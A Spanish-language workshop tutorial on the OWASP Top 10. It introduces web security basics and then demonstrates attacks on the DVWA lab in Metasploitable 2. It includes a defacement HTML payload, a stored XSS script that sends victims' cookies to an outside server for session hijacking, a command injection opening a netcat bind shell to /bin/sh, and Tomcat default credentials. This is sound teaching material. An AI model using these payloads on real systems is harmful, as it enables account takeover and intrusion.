# Workshop OWASP Top 10

El objetivo del workshop es facilitar una breve introducción a la seguridad informática y las vulnerabilidades web más frecuentes desde el punto de vista de alguien con no muy buenas intenciones.

### Índice del workshop

1. <a style="color:#000;text-decoration:none;cursor:pointer" href="#intro">Breve introducción</a>
  * Breve introducción informal al concepto de vulnerabilidad
  * Breve introducción informal a la seguridad informática
  * Breve introducción informal a OWASP
  * Breve introducción informal al proyecto OWASP Top 10
  * Breve introducción informal al modelo cliente-servidor
  * Las páginas web son, en su mayoría, ficheros de texto que están en otro ordenador
  * El gran problema de la seguridad web - La validación de los datos que nos facilita el usuario
  * Al cliente lo que es del cliente y al servidor lo que es del servidor
  * No todo es tan obvio. El protocolo HTTP es el lenguaje que usamos para solicitar estos ficheros de texto
  * El hacking y los 3 sombreros - Un modelo de pensar sobre ciberseguridad que genera desconfianza
<br><br>
2. <a style="color:#000;text-decoration:none;cursor:pointer" href="#kali">Primeros pasos con Kali Linux</a>
  * Auditorias de aplicaciones web y primeros pasos con Kali Linux
  * Máquinas vulnerables para practicar
    * Metasploitable 2
    * Pentesterlab
<br><br>
3. <a style="color:#000;text-decoration:none;cursor:pointer" href="#owasp">Verificando y explotando vulnerabilidades web</a>
  * Vulnerabilidades de la aplicación (bugs de la aplicación)
    * HTML Injection
    * XSS (Cross Site Scripting)
    * Ejecución de código para conseguir acceso remoto a una máquina por linea de comandos
  * Vulnerabilidades de configuración
    * Credenciales por defecto en servidor Tomcat
<br><br>

### Referencias usadas

1. Páginas web
  * [OWASP Testing Guide](https://www.owasp.org/index.php/OWASP_Testing_Project)

### 1. Breve Introducción

#### Breve introducción informal al concepto de vulnerabilidad

Los programas los hacen personas y los usan personas. Los fallos que cometen las personas que hacen los programas son fallos de diseño y se conocen como bugs. Los fallos que cometen las personas que usan los programas suelen ser fallos de configuración. Los fallos de diseño suelen estar asociados un programa o producto como, por ejemplo, fallos en el sistema operativo Windows o fallos en el programa abobe reader. Cuando un investigador detecta una vulnerabilidad en un producto de software como Microsoft Windows, suele reportarla al fábricante para que solucione el fallo y, una vez que el fábricante saca una actualización para arreglar el fallo, la vulnerabilidad pasa a ser conocida y se publica en una base de datos como [Common Vulnerabilities and Exposures](https://cve.mitre.org/):

<img src="img/cve_database.png" style="float:left">
<div style="clear:both"></div><br>

Estas vulnerabilidades conocidas de los productos suelen tener un número de CVE asociado y pueden ser consultadas para obtener información de la vulnerabilidad o para saber cómo arreglarla:

<img src="img/cve_database_1.png" style="float:left">
<div style="clear:both"></div><br>

Los fallos que comenten las personas que usan los programas suelen ser fallos de configuración como, por ejemplo, dejarse las contraseñas por defecto. Existen páginas web como [cirt.net](https://cirt.net/passwords):

<img src="img/default_passwords.png" style="float:left">
<div style="clear:both"></div><br>

donde pueden consultarse las contraseñas por defecto los productos de multitud fabricantes. Estas vulnerabilidades son importantes porque si son descubiertas por personas con malas intenciones, pueden ocasionar daños.

#### Breve introducción informal a la seguridad informática

La seguridad informática trata de protegernos de las personas con malas intenciones que se aprovechan de estas vulnerabilidades para ocasionar daños. En concreto, sus objetivos son asegurar confidencialidad, integridad y disponibilidad de la información o sistemas de información. Vamos a ver significa cada uno de estos objetivos:

  * La **confidencialidad** es restringir el acceso a la información o servicios a personas que no hayan sido autorizadas a usar ese servicio o a acceder a esa información. Por ejemplo, si tengo un diario online o fotos en las que salgo desnudo colgadas en internet, es asegúrame que sólo quién yo quiera lea el contenido del diario o vea mis fotos.
  * La **integridad** es asegurarnos que, cuando se transmite una información, el destinatario recibe exactamente esa información. Es decir, que la información no haya sido modificada durante el envió de la misma. Por ejemplo, asegurar que si enviamos una carta diciendo “Te quiero”, el cartero no la modifique y ponga “No te quiero”. Si no … ¡vaya faena!
  * La **disponibilidad** es asegurarse que los servicios del cliente estarán disponibles cuando los necesiten sus usuarios. Por ejemplo, asegurarse que la tienda online de El Corte Inglés estará disponible cuando una persona quiera comprar.
  
Las personas con malas intenciones van a intentar sacar partido de las vulnerabilidades que existen en los programas para poder ver las fotos en las que salgo desnudo sin tener permiso, para cambiar el contenido de mis cartas o para impedir que haga la compra en El Corte Inglés.
  
#### Breve introducción informal a OWASP

[Open Web Application Security Project (OWASP)](https://www.owasp.org/index.php/Main_Page) es una comunidad, sin ánimo de lucro, que desde el año 2001 está dedicada a mejorar la seguridad de los productos de software del mundo entero. Inicialmente estuvo enfocada en mejorar la seguridad en las aplicaciones web. Entre los miembros que dirigen los esfuerzos de esta organización, se encuentran perfiles profesionales de empresas como Mozilla, McAfee o Intel. Entre los proyectos más importantes que tiene OWASP están los siguientes:

  * [OWASP Top 10](https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project) enfocado en las 10 vulnerabilidades más frecuentes que podemos encontrarnos en aplicaciones web. Es el proyecto en el que se centra este workshop
  * [OWASP Testing Project](https://www.owasp.org/index.php/OWASP_Testing_Project) nos facilita una guía para auditar aplicaciones web en busca de vulnerabilidades conocidas
  * [OWASP Software Assurance Maturity Model (SAMM)](https://www.owasp.org/index.php/OWASP_SAMM_Project) para ayudar a las organizaciones a diseñar e implementar un modelo estratégico para la seguridad de las aplicaciones

#### Breve introducción informal al proyecto OWASP Top 10

El proyecto [OWASP Top 10](https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project) nos facilita un documento que continene información de los 10 tipos de vulnerabilidades más frecuentes en aplicaciones web. Desde que el proyecto comenzó en 2003, la lista ha ido cambiando a lo largo de los años atendiendo a la evolución en la arquitectura de las aplicaciones web, el feedback recibido por la organización por parte de la comunidad y a los siguientes factores de riesgo:

<img src="img/owasp_top_10_riesgos.png" style="float:left">
<div style="clear:both"></div><br>

  * **Explotabilidad** es la probabilidad de que un atacante pueda aprovecharse de la vulnerabilidad para hacer daño
  * **Prevalencia de la vulnerabilidad** es la probabilidad de que la vulnerabilidad este presente en la aplicación
  * **Detección de la vulnerabilidad** es la probabilidad de que un atacante detecte la vulnerabilidad
  * **Impacto técnico** es el impacto que se produciría si la vulnerabilidad se explota con éxito

La última actualización de 2017 trae algunos cambios en comparación con la lista de 2013:

<img src="img/owasp_top_10.png" style="float:left">
<div style="clear:both"></div><br>

Como la lista es de vulnerabilidades web, vamos a hacer una breve introducción informal a distintos componentes del ecosistema web.

#### Breve introducción informal al modelo cliente-servidor

Cuando queremos acceder a una página web, abrimos un navegador, como Google [Chrome](https://www.google.es/chrome/index.html) o Mozilla [Firefox](https://www.mozilla.org/es-ES/firefox/), y buscamos la página web en un buscador o simplemente tecleamos la dirección de la página a la que queremos acceder. La página web que deseamos visualizar se encuentra otro ordenador al que llamamos servidor y, como hemos sido nosotros, desde nuestro navegador, quienes hemos solicitado la web, eso nos convierte en clientes. La mayoría de servicios en internet funcionan de acuerdo a un modelo que se llama: [cliente-servidor](https://es.wikipedia.org/wiki/Cliente-servidor). Este modelo lo forman 2 componentes principales:

  * cliente (demanda y consume servicios)
  * servidor (da servicio a los clientes)

Para extrapolarlo a la vida real, pensemos en una cafetería. En la cafetería el camarero sería el servidor y una persona que entre a tomar un café sería el cliente. La persona pide un café al camarero y el camarero se lo sirve. Si hay muchas personas por cada camarero, probablemente sintamos que se degrada el servicio. Y si hay muchos camareros y pocos clientes, probablemente el servicio no sea rentable. Hay servicios que pueden ser más complicados. Por ejemplo, un bar de copas. En el bar de copas, si una persona solicita un bebida alcohólica, el camarero antes de servirla, debería asegurarse que la persona tiene la edad legal para consumirla verificando su documento de identidad. Hemos puesto de ejemplo un bar de copas, pero existen muchos tipos de servicios, por ejemplo, correos es un servicio en el que una persona (cliente) puede escribir una carta y solicitar que se envié certificada a otra persona. Telepizza es otro servicio a donde una persona (cliente) puede pedir una pizza para que el servicio a domicilio de [Telepizza](https://es.wikipedia.org/wiki/Telepizza) se la lleve a casa.

En internet, funcionan las cosas del mismo modo, sólo que los servicios que solicitamos son muchas veces diferentes a los que usamos en la vida real. Por ejemplo, en internet, la persona solicita enviar un correo electrónico o ver una página web.

#### Las páginas web son, en su mayoría, ficheros de texto que están en otro ordenador

Cuando hablamos de páginas web, normalmente nos referimos a lo que los navegadores nos muestran en la pantalla cuando accedemos a una página web. Pero esto no es así. Las páginas web son simplemente documentos texto y el navegador web es un programa que interpreta el texto de estos ficheros para mostrarlos en un formato visualmente más agradable o hacerlos interactivos. Veamos un ejemplo. Imaginemos que tenemos un archivo en el ordenador llamado *ejemplo.html* que tiene el siguiente texto:

```html
<!doctype html>

<html lang="es" itemscope itemtype="http://schema.org/WebPage">

	<head>
	
		<meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
		
		<title></title>
		
		<style>
			html{font-size:24px;}
			body * {box-sizing:border-box;}
			body{margin:0;padding:0;height:100%;}
            header, fieldset, label, input, main {margin:0;padding:0;outline:0;border:0;display:block;}
			input[type="email"]{padding:5px 10px;margin:0px auto;}
            input[type="text"]{padding:5px 10px;margin:0px auto;}
			input[type="submit"]{padding:5px 10px;margin:10px auto;cursor:pointer;border-radius:5px;background:#DEB887;}
			h2{font-weight:normal;padding:10px;}
            .pagina{display:block;max-width:900px;margin:0 auto;}
			.todo-ancho{width:100%;}
			.setenta{width:70%;}
			.treinta{width:30%;}
			.centrar-texto{text-align:center;}
			.texto-grande{font-size: 2em;}
			.texto-mediano{font-size: 1.2em}
			.texto-pequeño{font-size: 0.8em;}
			.borde-email{border-bottom:1px dashed #666;}
			.con-borde-rojo{border:2px dashed #DEB887;}
		</style>
		
	</head>
	
	<body>
	
		<header class="pagina">
			<h1 class="centrar-texto texto-grande">El hogar de los gatos trastos</h1>
			<img src="https://placekitten.com/g/900/300">
			<h2 class="centrar-texto texto-mediano con-borde-rojo">Esta página web se encuentra en proceso de desarrollo</h2>
		</header>
		
		<main class="pagina">
			<h1></h1>
			<p>Por favor, facilitenos su dirección de email y en cuanto este terminada le avisaremos para venga a visitarnos:</p>
			<form class="form" action="#" method="post" id="registro">
                <div class="todo-ancho">
                    <input type="email" id="email" placeholder="emaildegatotrasto@dominio.es" name="email" class="setenta centrar-texto texto-mediano borde-email">
					<input type="submit" id="submit" value="Guardar mi email &#128576;" class="setenta centrar-texto texto-mediano">
                </div>
            </form>
		</main>
	
	</body>

</html>
```

Si abrimos este fichero en el bloc de notas de windows, veremos el texto:

<img src="img/web_notepad.png" style="float:left">
<div style="clear:both"></div><br>

Pero si abrimos el archivo en un navegador de internet, el texto será interpretado por el navegador y nos mostrará el contenido en un formato visual más agradable a la vista:

<img src="img/web_firefox_1.png" style="float:left">
<div style="clear:both"></div><br>

Este contenido suele ser interactivo para el usuario. Por ejemplo, en este podemos escribir un email:

<img src="img/web_firefox_2.png" style="float:left">
<div style="clear:both"></div><br>

#### El gran problema de la seguridad web - La validación de los datos que nos facilita el usuario

Lo que ocurre es que no todos los usuarios vienen con buenas intenciones y algunos de ellos en vez de teclear su email, o bien pueden ser un poco trastos o bien teclear algo con intenciones poco éticas:

<img src="img/web_firefox_3.png" style="float:left">
<div style="clear:both"></div><br>

y aquí esta el gran problema al que se enfrentan las aplicaciones web. Adivinar de antemano todas las trastadas posibles que un usuario puede teclear. Lo que formalmente se conoce como el problema de validar correctamente los datos que nos facilita el usuario. Muchos de los datos que nos facilita un usuario, normalmente, se guardan en una base de datos y se muestran a demanda de los clientes. Cuando los datos se muestran pueden modificar el texto original y hacer que el navegador los interprete de forma distinta. Veremos algún ejemplo.

#### Al cliente lo que es del cliente y al servidor lo que es del servidor

Por si fuera poco pensar en todas las ideas creativas que un trasto puede tener, también tenemos que pensar que ocurre a cada lado de la barra del bar. Si recordáis esto de internet funcionaba con clientes (navegadores) que entran en un bar a pedir al camarero (servidor) un café. En el lado de la barra del camarero (servidor), manda el camarero, pero en el lado de la barra del cliente (navegador), manda el cliente. Es decir, que si el camarero (servidor) me sirve un café yo, como cliente, una vez que tengo el café, puedo elegir si tomarmelo o echarlo dentro de la coca cola de alguien. Extrapolandolo al mundo web, cuando a mi un camarero (servidor) me da una página web (archivo de texto), yo puedo hacer con ella lo que quiera. Veamos un ejemplo. Si accedemos con nuestro navegador a la página de [apple](https://www.apple.com/es/), veremos la interpretación del fichero de texto que hace el navegador:

<img src="img/apple_1.png" style="float:left">
<div style="clear:both"></div><br>

Si en vez de la interpretación que hace el navegador del texto, queremos ver el propio texto. Podemos pulsar la tecla **F12** en el teclado:

<img src="img/apple_2.png" style="float:left">
<div style="clear:both"></div><br>

Este texto, al igual que el café, está ahora en mi lado de la barra y hacer lo que quiera. Por ejemplo, puedo localizar en el texto la parte del título de la página y modificar el texto para poner el texto que yo quiera:

<img src="img/apple_3.png" style="float:left">
<div style="clear:both"></div><br>

y en mi navegador la visualización será distinta:

<img src="img/apple_4.png" style="float:left">
<div style="clear:both"></div><br>

Ahora bién, los cambios que yo he hecho en mi café no afectan a los siguientes cafés que ponga el camarero. Es decir que si pido un nuevo un café (la página web) al camarero (servidor), el camarero (servidor) me pondrá un café exactamente igual al que me puso. Es decir, que si pido al camarero (servidor) nuevamente la página web, me servirá el mismo café (página web) que anteriormente:

<img src="img/apple_1.png" style="float:left">
<div style="clear:both"></div><br>

Ahora bien en este caso, sólo hemos cambiado el texto (nuestro café) a modo de demostración. Vamos a ver ahora como cambiar el texto para saltarnos controles de seguridad en el lado del cliente (navegador). Para este ejemplo he subido la página de los gatos trastos a un servidor y he llamado al archivo email_sin_verificar.php. Si volvemos a la página de los *gatos trastos* y en donde nos pedía el email, ponemos otra cosa que no sea un email y pulsamos el botón *Guardar mi email*, nos dará un error y nos solicitará que metamos una dirección de email válida:

<img src="img/web_firefox_4.png" style="float:left">
<div style="clear:both"></div><br>

Como esta verificación de datos se está produciendo del lado del cliente, podemos desactivarla. Para ello decimos que nos muestre el texto de la página web pulsando la tecla *F12* y buscamos en el texto que esta interpretando el navagador la parte del formulario en donde se mete el email. Vemos que el tipo de campo es email:

<img src="img/web_firefox_5.png" style="float:left">
<div style="clear:both"></div><br>

Y lo sustituimos el tipo de *email* por *text* y veremos que ya no nos muestra ni el recuadro rojo ni el mensaje de error:

<img src="img/web_firefox_6.png" style="float:left">
<div style="clear:both"></div><br>

Si ahora pulsamos el botón *Guardar mi email*:

<img src="img/web_firefox_7.png" style="float:left">
<div style="clear:both"></div><br>

se enviará al servidor lo que hayamos escrito en vez del email. Es decir, nos habremos saltado este mecanismo de seguridad en el lado del cliente y, si el servidor no valida los datos, probablemente nos muestre que el email se ha registrado correctamente:

<img src="img/web_firefox_8.png" style="float:left">
<div style="clear:both"></div><br>

Es decir, que un usuario siempre podrá alterar los datos que se envian al servidor. Una vez que se envían los datos, dependerá de que el camarero (servidor) compruebe que email que el cliente le ha dado es válido. Algunas aplicaciones web confían en o bien en la validación de los datos que se realiza en el navegador o bien en que les llegarán los datos que ellos esperan y, como hemos visto, esta no es así. El usuario tiene todo el control sobre los datos que envia al servidor. En la vida real el cliente puede pagar con dinero falso o decir que su cuenta ya la ha pagado otro, el camerero (servidor) siempre debe verificar que el dinero (datos) que le enviamos sea correcto. En este caso al no validarse, el dinero falso (texto que hemos metido) hubiese pagado la cuenta. En muchos casos la validación de los datos que nos facilita un usuario es un proceso complicado para los camareros (servidores). Otras veces los ciclos de desarrollo -cada vez más agresivos y con menos personal- obligan a dejar de lado estas tareas. Lo que facilita enormente la tarea de los usuarios con intenciones poco éticas. El usuario con intenciones poco éticas sólo tiene que encontrar un fallo, mientras que el desarrollador no puede cometer ninguno. Para mostrar un ejemplo, también he subido el fichero email_verificado.php en donde si tecleamos algo que no sea un email, el camarero (servidor) se dará cuenta que no es un email y nos lo notificará

<img src="img/web_firefox_9.png" style="float:left">
<div style="clear:both"></div><br>

Los datos que pedimos a los usuarios en formularios, al igual que el dinero cuando pagamos una consumición, es obvio que hay que validarlo pero...

#### No todo es tan obvio. El protocolo HTTP es el lenguaje que usamos para solicitar estos ficheros de texto

Hasta ahora hemos utilizado el navegador para solicitar ficheros de texto e imagenes a los que coloquialmente llamamos páginas webs. Sin embargo no sabemos cómo el navegador (cliente) pide estos ficheros. En España, normalmente utilizamos la lengua castellana para solicitar un café al camarero (servidor) y en internet, el navegador web utiliza un lenguaje (protocolo) llamado HTTP para pedir los cafés (páginas web) al camarero (servidor). Es decir que, cuando nuestro navegador (cliente) solicita una página web envía información adiccional en unos campos llamados cabeceras. Estas cabeceras pueden verse pulsando *F12* en nuestro navegador y haciendo click en la pestaña de red:

<img src="img/apple_5.png" style="float:left">
<div style="clear:both"></div><br>

Estas cabeceras también se pueden modificar y los datos de entrada de las mismas también deben ser validados. Como vemos no todo es tan obvio como los datos de un formulario. En el ecosistema web, entre otras, se integran las siguientes tecnologías:

  * Lado del cliente
    * HTML
    * CSS
    * ECMAScript (JavaScript)
    
    
  * Lado del servidor
    * Bastionado del sistema operativo servidor
    * Programa que hace de servidor
    * Lenguaje en el que programamos lo que hace nuestro camarero
    
    
Como vemos hay demasiadas tecnologías de base que deben trabajar juntas. Al ser mercado muy especializado y competitivo, hace muy difícil la labor de jugar en equipo ya que, en mi experiencia, se antepone la especialización a la trasversalidad. Y en un equipo con todo delanteros, los goles te los meten a tí.

#### El hacking y los 3 sombreros - Un modelo de pensar sobre ciberseguridad que genera desconfianza

Aparte de ser un ecosistema complicado en el tienen que integrase multitud de tecnologias, en muchas ocasiones se presenta la seguridad como un conflicto entre los hackers con sombrero negro, también llamados black hats o cibercriminales, que realizan todo tipo de acciones deleznables sin ninguna ética y los hackers de sombrero blanco, también llamados white hats, hackers éticos o profesionales de la ciberseguridad, que nos protegen de los cibercriminales. Como bien apunto [Douglas Crockford](https://en.wikipedia.org/wiki/Douglas_Crockford) en su conferencia [Principles of Security](https://www.youtube.com/watch?v=zKuFu19LgZA), esta forma de pensar sobre ciberseguridad genera desconfianza porque muchos de los mejores white hats actuales fueron anteriormente black hats y muchos de los black hats que se detienen eran antiguos white hats. Y por si fuera poco también exiten los hackers que llevan sombrero gris (grey hats) que, depende como tengan el día, harán cosas buenas o malas. Es decir, que viendo el panorama, deberiamos sospechar de cualquier hacker lleve el sombrero que lleve porque se lo cambian muy a menudo. Debido a estó, la seguridad de la compañia no puede delegarse a los white hats o profesionales de la ciberseguridad, sino que debe ser trabajo de todos. Podemos y es aconsejable apoyarse en profesionales de la ciberseguridad pero la seguridad debe ser un esfuerzo trasversal de toda la compañia.

<a name="kali"></a>

### 2. Auditorías de aplicaciones web y primeros pasos con Kali Linux

#### Auditorias de aplicaciones web y primeros pasos con Kali Linux

Kali Linux es un sistema operativo que contiene muchas herramientas muy útiles para detectar, verificar y sacar partido de las vulnerabilidades que podemos encontrar en las aplicaciones web. Al ser este un tutorial de iniciación, vamos a ver sólo 2 de ellas:

  * **Burp suite** => Es un conjunto de herramientas que resultan muy útiles a la hora de interactuar como clientes con los servicios (camareros) web. De todas las que tiene, veremos como usar el proxy. Un proxy es un equipo que ponemos en medio de otros dos para distintos propósitos. En nuestro caso el propósito para que lo usaremos será para modificar la información addicional, esa que llamamos cabeceras, que se envian camarero (servidor) cuando pedimos un café (página web)
  
  * **Netcat** => es una herramienta muy completa que, entre otras cosas, nos permite crear camareros (servidores) y clientes a nuestro gusto.

#### Máquinas vulnerables para practicar

  * [Metasploitable 2](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/) Es una de las primeras máquinas vulnerables recomendadas para personas que se están aprendiendo
  * [Pentesterlab](https://pentesterlab.com/) Es una página que nos va a enseñar como sacar partido de muchas vulnerabilidades que se encuentran en aplicaciones web


<a name="owasp"></a>

### 3. Verificando y explotando vulnerabilidades de OWASP Top 10

Vamos a ver como podemos aprovecharnos que no haya validación de los datos que nos envía el usuario o que la validación de los datos sea incorrecta.

#### HTML Injection

Vamos a usar una aplicación que se llama dvwa que está incluida en metasploitable 2. Vamos a comenzar viendo como sólo utilizando HTML y CSS, podemos ser capaces de cambiar el aspecto visual de una web.

En cualquier sitio donde nos permitan hacer comentarios, ya sea en noticias de periódicos, foros, un libro de visitas, etc.

<img src="img/deface_1.png" style="float:left">
<div style="clear:both"></div><br>

Probablemente, aparte de escribir comentarios con sólo texto:

<img src="img/deface_2.png" style="float:left">
<div style="clear:both"></div><br>

también nos permitan escribir comentarios utilizando etiquetas HTML. Por ejemplo, quizá algún participante quiera poner alguna palabra en negrita para darle importancia:

<img src="img/deface_3.png" style="float:left">
<div style="clear:both"></div><br>

Vemos que la palabra **serio** esta en negrita:

<img src="img/deface_4.png" style="float:left">
<div style="clear:both"></div><br>

hasta aquí todo bien. Asimismo vemos que, si intentamos poner un comentario demasiado largo, no podemos. En este caso llegados a la letra r de la palabra corta, no nos permite continuar:

<img src="img/deface_5.png" style="float:left">
<div style="clear:both"></div><br>

Vamos a ver primero como desactivar esta limitación a la hora de hacer comentarios. Para ello, usamos la tecla *F12* para desbloquear ver el texto de la web. Hacemos click en la flecha que está arriba a la izquierda del cuadro de opciones que se nos ha desplegado:

<img src="img/deface_6.png" style="float:left">
<div style="clear:both"></div><br>

y hacemos click sobre el recuadro del comentario para ver en el texto donde está:

<img src="img/deface_7.png" style="float:left">
<div style="clear:both"></div><br>

Una vez localizado nos damos cuenta que nos están limitando la longitud del texto a 50 caracteres. Como queremos escribir más de 50 caracteres, seleccionamos el texto haciendo doble click y borramos el atributo maxlength:

<img src="img/deface_8.png" style="float:left">
<div style="clear:both"></div><br>

ahora podremos escribir todo lo que queramos:

<img src="img/deface_10.png" style="float:left">
<div style="clear:both"></div><br>

que ocurre si ahora en vez de hacer un comentario, llega un usuario trasto y mete las siguientes etiquetas html:

```html
<div style="position:absolute;left:0;top:0;width:100%;height:100%;background:black;color:white;z-index:9999"><h1 style="text-align=center;margin-top:10px;">Trasto ha estado aquí</h1><img src="https://placekitten.com/g/900/600"></div>
```

en el recuadro de comentario y hace click en el boton Sign Guestbook:

<img src="img/deface_11.png" style="float:left">
<div style="clear:both"></div><br>

si esto ocurre, habrá conseguido que, en vez del contenido de nuestra web, se muestre el contenido que el quiera:

<img src="img/deface_12.png" style="float:left">
<div style="clear:both"></div><br>

Este cambio es permanente hasta que un administrador borre el comentario de la base de datos y, aunque no se haya inflingido daño a nivel de aplicación, a nivel de reputación de la compañia puede tener efectos muy negativos.

#### XSS (Cross Site Scripting)

Aparte añadir etiquetas HTML y darles formato, o posicionarlas, con CSS, en muchos casos también podemos añadir código en JavaScript. Aunque se puede añadir en muchos sitios, con el fin de hacerlo fácil, vamos a ver como añadir nuestro propio código en el lado del cliente, enviarselo al servidor (camarero) para que, cada vez que sirva una web, esta incluya nuestro código. Vamos a ver como, con muy poquito código, podemos suplantar la identidad de otro usuario. La mayoría de los mecanismos que nos permiten mantener una sesión en una página web funcionan a través de un texto cookies. Se puede acceder a las cookies de una página y enviarlas a un servidor remoto usando JavaScript. Si tenemos el texto de la cookie de un usuario, seremos capaces de suplantar su identidad. Para ello, tras desactivar la limitación de los caracteres, hacemos un comentario en el mismo sitio que antes, añadiendo tras el comentario el siguiente código que, no sólo va acceder a la cookie del usuario, sino que la enviará a un servidor remoto:

```
<script>fetch(`https://workshop-owasp-eparra.c9users.io/getcookie.php?data=${document.cookie}`);</script>
```

Tras añadir el comentario y el código, pulsamos el botón Sign Guestbook:

<img src="img/xss_1.png" style="float:left">
<div style="clear:both"></div><br>

Veremos que el comentario se añade y que sólo muestra el texto:

<img src="img/xss_2.png" style="float:left">
<div style="clear:both"></div><br>

Qué ocurre si ahora, en cualquier ordenador de su casa entra otro usuario a la aplicación. Por ejemplo, el administrador:

<img src="img/xss_4.png" style="float:left">
<div style="clear:both"></div><br>

y accede a ver los comentarios:

<img src="img/xss_5.png" style="float:left">
<div style="clear:both"></div><br>

El usuario verá los comentarios y no notará nada. Sin embargo, en nuestro servidor, habremos recibido la cookie de ese usuario:

<img src="img/xss_6.png" style="float:left">
<div style="clear:both"></div><br>

y podremos suplantar su identidad. Vamos a ver una manera de hacerlo, usando Burp Suite. Si yo intento acceder a la web y no estoy autenticado, se me presentará la pantalla de login:

<img src="img/xss_7.png" style="float:left">
<div style="clear:both"></div><br>

Abro burp suite:

<img src="img/xss_8.png" style="float:left">
<div style="clear:both"></div><br>

para usar el proxy y lo configuro en mi navegador:

<img src="img/xss_9.png" style="float:left">
<div style="clear:both"></div><br>

y selecciono que incercepte las peticiones que haga:

<img src="img/xss_10.png" style="float:left">
<div style="clear:both"></div><br>

tecleo la URL, 192.168.119.8/dvwa/ y pulso en la flecha:

<img src="img/xss_11.png" style="float:left">
<div style="clear:both"></div><br>

Veo que el proxy (equipo intermedio) captura la petición. En las cabeceras de la petición vemos la cookie que el servidor le ha dado a nuestro navegador:

<img src="img/xss_12.png" style="float:left">
<div style="clear:both"></div><br>

La borramos:

<img src="img/xss_13.png" style="float:left">
<div style="clear:both"></div><br>

Copiamos la cookie que hemos robado:

<img src="img/xss_14.png" style="float:left">
<div style="clear:both"></div><br>

y la pegamos en el proxy:

<img src="img/xss_15.png" style="float:left">
<div style="clear:both"></div><br>

Pulsamos el botón Forward (a veces más de una vez):

<img src="img/xss_16.png" style="float:left">
<div style="clear:both"></div><br>

y veremos que, aunque no sepamos ni el usuario ni la contraseña, estamos logados en la aplicación como el administrador:

<img src="img/xss_17.png" style="float:left">
<div style="clear:both"></div><br>

#### Ejecución de código para conseguir acceso remoto a una máquina por linea de comandos

Vamos ver como aprovecharnos nuevamente de que no se validen correctamente los datos de entrada para ganar acceso no autorizado a un equipo usando la línea de comandos. Para ello, pulsamos el botón Command Execution. Veremos un formulario que nos permite hacer ping a cualquier página web:

<img src="img/remote_1.png" style="float:left">
<div style="clear:both"></div><br>

Probamos a hacer ping a la página de google ya que es muy probable que este activa. Tecleamos google y pulsamos el botón submit:

<img src="img/remote_2.png" style="float:left">
<div style="clear:both"></div><br>

y veremos que se ha realizado el ping a google:

<img src="img/remote_3.png" style="float:left">
<div style="clear:both"></div><br>

En los sistemas operativos GNU/Linux se pueden encadenar comandos usando dos veces el símbolo &. Vamos a probar si podemos ejecutar un segundo comando que diga hola por pantalla:

<img src="img/remote_4.png" style="float:left">
<div style="clear:both"></div><br>

y comprobamos que si se puede:

<img src="img/remote_5.png" style="float:left">
<div style="clear:both"></div><br>

Bien pues sabiendo que podemos ejecutar comandos. Vamos a aprovecharnos del comando nc (netcat) para crear un camarero (servidor) que escuche peticiones que le hagamos. Esta vez el cliente, en vez de ser el navegador, será la línea de comandos. Para crear el camarero con netcat, ejecutaremos el comando nc pasandole las siguientes opciones:

  * **-l** => para indicarle que escuche a los clientes que le pidan cafés (conexiones)
  * **-p** => para indicarle a traves de qué ventanilla van a pedirle las cosas. Las ventanillas normalmente tienen un número asociado. En este caso le vamos a decir que sólo atienda a los clientes que vayan a la ventanilla 1234
  * **-e** => para decirles que tipo de café (servicio) quieren los clientes que se les sirva. En este caso vamos a indicar al camarero que les a los clientes acceso al programa sh (consola de comandos) que se encuentra en la carpeta bin
  
Es decir en este caso pondremos:

nc -lp 1234 -e /bin/sh

<img src="img/remote_6.png" style="float:left">
<div style="clear:both"></div><br>

Ahora si desde una consola de comandos, nos realizamos una petición al camarero a través de la ventanilla 1234, nos servirá el programa sh:

<img src="img/remote_8.png" style="float:left">
<div style="clear:both"></div><br>

y podremos ejecutar comandos. Por ejemplo, podemos ejecutar el comando whoami para saber con que usuario hemos accedido a la máquina:

<img src="img/remote_9.png" style="float:left">
<div style="clear:both"></div><br>

o leer el archivo (/etc/passwd) donde están todos los usuarios de la máquina:

<img src="img/remote_10.png" style="float:left">
<div style="clear:both"></div><br>

#### Credenciales por defecto en servidor Tomcat

Los servidores (camareros) Tomcat tienen una página de administración que se llama manager. Esta página, en muchas ocasiones la dejan con las contraseñas que viene por defecto. Accedemos al servidor tomcat y en el menú de la izquierda, pulsamos sobre Tomcat Manager:

<img src="img/tomcat_1.png" style="float:left">
<div style="clear:both"></div><br>

y veremos que nos aparece un formulario de login:

<img src="img/tomcat_2.png" style="float:left">
<div style="clear:both"></div><br>

Consultamos las contraseñas por defecto de los servidores tomcat:

<img src="img/tomcat_3.png" style="float:left">
<div style="clear:both"></div><br>

En este caso es tomcat el usuario y tomcat la contraseña:

<img src="img/tomcat_4.png" style="float:left">
<div style="clear:both"></div><br>

Desde donde podremos acceder al panel de administración del servidor Tomcat:

<img src="img/tomcat_5.png" style="float:left">
<div style="clear:both"></div><br>